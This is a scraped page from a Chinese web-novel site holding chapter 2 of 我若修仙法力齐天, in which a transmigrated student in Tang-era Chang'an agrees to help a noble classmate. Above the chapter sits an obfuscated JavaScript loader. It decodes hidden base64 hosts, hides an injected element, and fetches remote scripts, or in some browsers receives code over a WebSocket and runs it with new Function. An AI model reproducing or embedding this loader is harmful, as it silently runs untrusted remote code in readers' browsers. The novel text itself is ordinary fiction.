笔趣阁

字:
关灯 护眼
笔趣阁 > 我若修仙法力齐天 > 第二章 神仙粉
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第二章 神仙粉

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
李鸿儒确定自己并非魔怔,沉浸于游戏中不可自拔十几年。
  但他脑海中确实有这么一个古怪的玩意儿。
  这并非游戏的世界。
  那个游戏也没有长安这么一个城市。
  更无大唐这么一个国度。
  这并非太吾的世界。
  李鸿儒没有学到任何可用的技能,也不知如何运用面板上的各类数据。
  除了让他拥有的部分记忆复苏,太吾的数据并无其他好处。
  李鸿儒曾经怀疑过自己是不是时光穿梭回到了古代。
  但除了大唐,周边一些国度的名字让他很懵。
  什么汗国、朱紫国、大食国……
  当然,李鸿儒是个历史渣,所知甚少。
  便是读的这些经书,他以前也从未接触过。
  身处阶层不高,难以知道外界信息之时,他更是难于窥探到全貌。
  但不管这是什么样的地方和什么样的世界,这并不影响他正常生活。
  李鸿儒早年还有点对比和确认的小心思,试图弄清楚一些曾经的猜测。
  待得数年过去,他已经全然放下。
  就算这是历史上的大唐,那也与他无关。
  他只是一个卖布老板的儿子,不是历史上什么有名有姓的人物,更无途径认识一些大名讳的人物。
  能认识荣才俊,这已经算他聪慧过人,善于利用知识的力量。
  否则以这家伙的地位和财富,哪里会放下身段来求他这种平民。
  多一个时代的记忆多多少少还是带来了一些作用,李鸿儒性情快速进入到成年期,少有少年的莽撞。
  他还在八年前展示‘过人’的诗书天赋,念了一首翻版的《咏鸡》,捞了一个‘东市博望街小神童’的称号。
  这让他最终顺利在万人中突围,数年后进入到四门馆中深造。
  这是长安城平民能读到的最上层学府,诸多侯伯子男爵位的后代也在这儿学习。
  只是他的天赋如同方仲永一般,随着年岁的增长迅速消退了下去,变得泯然众人,毫无出彩可言。
  再怎么说,世界已经完全不同,李鸿儒没可能靠着上辈子那点文化走天下,需要进行学习和融入。
  “怎么样?”
  荣才俊再次递小纸条之时,李鸿儒迅速点了点头,同意了对方的请求。
  借出宝镜没问题,看魏大人砍龙头也没问题。
  荣才俊有需求,他也有增长见识的需求,即便砍头也是不菲的见识。
  午门是重地,这种砍头大事的观看者又甚多,他亦需要借助荣才俊的关系才方便找到一处合适观看的场所。
  “这位同学点头,想必是对我提及乾马之说另有异议,请站起来阐述一番自己的见解。”
  课堂之上死气沉沉。
  众多人面含笑意,摇头晃脑,但神思已经完全放在了其他之处,难得有人点头,骆永思顿时就精神了不少。
  《易》繁杂枯燥深奥,但这又是必学之书。
  他只是三桶水,没有大儒水准,可以讲得深入浅出,照本宣科之下,这帮学生自然难以听懂。
  点名稍微探讨一番,或许有一些裨益。
  他教鞭一扬之时,李鸿儒身体还抖动了一下。
  待看到荣才俊苦着脸主动站起来,李鸿儒一颗心才放了下去。
  “骆助教,我没有异议,学生只是听得如痴如醉,情不自禁的点了点头,这表示完全赞同您的宣讲呀!您的乾马之说真是太棒了!”
  荣才俊茫然了一秒,随即开启了屡试不爽的拍马屁手段。
  作为世家子弟,荣才俊才华并不算太出色,但识色圆场的能力不缺。
  与骆永思交谈之时,他连连送出几个大马屁,骆永思才让他坐了下来。
  两人商议完毕,骆永思时不时又将目光放向荣才俊这个让他倍感舒爽的学生身上,荣才俊接下来倒没有递小纸条。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师